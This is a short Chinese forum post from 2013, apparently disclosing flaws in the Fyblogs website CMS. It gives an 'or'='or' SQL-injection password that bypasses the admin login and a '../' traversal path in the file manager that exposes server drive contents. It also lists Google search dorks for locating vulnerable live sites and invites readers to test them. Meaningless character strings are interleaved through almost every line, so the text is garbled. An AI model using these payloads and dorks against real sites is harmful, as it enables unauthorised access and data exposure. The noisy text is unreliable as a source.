漏洞类型: 未授权访问/权限绕过! }/ t) {4 k/ @, D$ H; z
2 V$ x6 Z5 Z4 E0 I* @# Y5 v. G) x简要描述:5 r9 B/ o o! [% A1 Z3 _7 b
0 e& D; [7 _7 a I
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!/ I: a. Z& Z6 P
" d }3 i) r0 R5 X4 l8 G6 N9 I详细说明:9 D- }6 d3 W7 U- f
& Q: z5 t: X& ]7 y后台万能密码 'or'='or'- h7 [( B* x4 ?
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!* Z5 ~. t N1 h: _/ u8 b& h
admin/uploadfile.asp?currentFolder=/upfiles/../# C f2 h! k0 z: f/ A0 @
% U0 \) N& B9 y: {( Y漏洞证明:# B- v ^9 l' {5 k
0 J2 h0 p/ x+ R) ]) S% |# n谷歌:inurl:type.asp?id=1 新闻中心! }; h2 D9 k, @% @7 ]3 D. b
或者 :inurl:download_ok.asp? B% Z; t" @7 Y) L" H
+ B" S, W. f% V
可以测试* x5 D$ y) b" A+ o3 U
& o: z; B; D$ |( d5 M7 u
B, M9 Y' L& i2 }. `9 c |
发表于 2013-3-7 13:07:46
收藏
支持
反对